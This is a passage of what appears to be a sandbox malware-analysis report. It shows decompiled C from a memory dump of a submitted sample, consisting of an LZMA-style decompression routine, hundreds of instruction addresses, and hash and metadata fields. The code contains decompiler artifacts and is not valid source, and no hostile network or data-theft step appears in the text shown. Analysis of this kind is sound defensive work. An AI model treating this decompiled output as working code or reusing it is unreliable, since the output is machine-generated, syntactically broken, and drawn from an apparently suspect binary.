												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406fbb
0x00406fbb
0x00406fbf
0x00406fcc
0x00406fd6
0x00000000
0x00406fc1
0x00406fc1
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406fbf

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F07() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
